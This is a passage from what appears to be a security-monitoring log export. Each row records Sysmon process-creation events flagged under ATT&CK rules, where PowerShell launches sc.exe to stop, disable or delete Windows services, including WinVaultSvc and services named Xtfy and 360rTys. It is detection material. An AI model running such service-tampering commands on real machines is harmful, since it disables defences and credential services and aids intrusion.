Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop 360rTys"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:30.906",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:02.443 +ProcessGuid: {df9fc3d3-b3f2-5ecf-0000-00106f6c2e00} +ProcessId: 7960 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfyxxx +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfyxxx",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:02.472026100Z"",""eventRecordID"":""3455"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:02.443\r\nProcessGuid: {df9fc3d3-b3f2-5ecf-0000-00106f6c2e00}\r\nProcessId: 7960\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfyxxx\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John 
Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:02.443"",""processGuid"":""{df9fc3d3-b3f2-5ecf-0000-00106f6c2e00}"",""processId"":""7960"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfyxxx"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:30.777",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:02.325 
+ProcessGuid: {df9fc3d3-b3f2-5ecf-0000-0010136a2e00} +ProcessId: 3932 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfya +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfya",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:02.330762400Z"",""eventRecordID"":""3452"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:02.325\r\nProcessGuid: {df9fc3d3-b3f2-5ecf-0000-0010136a2e00}\r\nProcessId: 3932\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfya\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:02.325"",""processGuid"":""{df9fc3d3-b3f2-5ecf-0000-0010136a2e00}"",""processId"":""3932"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfya"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 
2020 @ 14:20:29.783",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:01.771 +ProcessGuid: {df9fc3d3-b3f1-5ecf-0000-00103b672e00} +ProcessId: 6328 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Xtfya Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Xtfya Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:02.017230300Z"",""eventRecordID"":""3451"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:01.771\r\nProcessGuid: {df9fc3d3-b3f1-5ecf-0000-00103b672e00}\r\nProcessId: 6328\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 
(WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Xtfya Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:01.771"",""processGuid"":""{df9fc3d3-b3f1-5ecf-0000-00103b672e00}"",""processId"":""6328"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Xtfya Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:29.742",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:01.063 +ProcessGuid: {df9fc3d3-b3f1-5ecf-0000-001040632e00} +ProcessId: 8100 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfy +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
Xtfy",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:01.170390300Z"",""eventRecordID"":""3449"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:01.063\r\nProcessGuid: {df9fc3d3-b3f1-5ecf-0000-001040632e00}\r\nProcessId: 8100\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfy\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:01.063"",""processGuid"":""{df9fc3d3-b3f1-5ecf-0000-001040632e00}"",""processId"":""8100"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® 
Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfy"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:29.679",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:00.732 +ProcessGuid: {df9fc3d3-b3f0-5ecf-0000-0010bb5e2e00} +ProcessId: 336 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinVaultSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinVaultSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:00.737434900Z"",""eventRecordID"":""3446"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:00.732\r\nProcessGuid: {df9fc3d3-b3f0-5ecf-0000-0010bb5e2e00}\r\nProcessId: 336\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinVaultSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:00.732"",""processGuid"":""{df9fc3d3-b3f0-5ecf-0000-0010bb5e2e00}"",""processId"":""336"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinVaultSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:29.594",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:00.612 +ProcessGuid: {df9fc3d3-b3f0-5ecf-0000-0010625c2e00} +ProcessId: 5196 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete SvcNlauser +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete SvcNlauser",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:00.656651600Z"",""eventRecordID"":""3444"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:00.612\r\nProcessGuid: {df9fc3d3-b3f0-5ecf-0000-0010625c2e00}\r\nProcessId: 5196\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete SvcNlauser\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:00.612"",""processGuid"":""{df9fc3d3-b3f0-5ecf-0000-0010625c2e00}"",""processId"":""5196"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete SvcNlauser"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 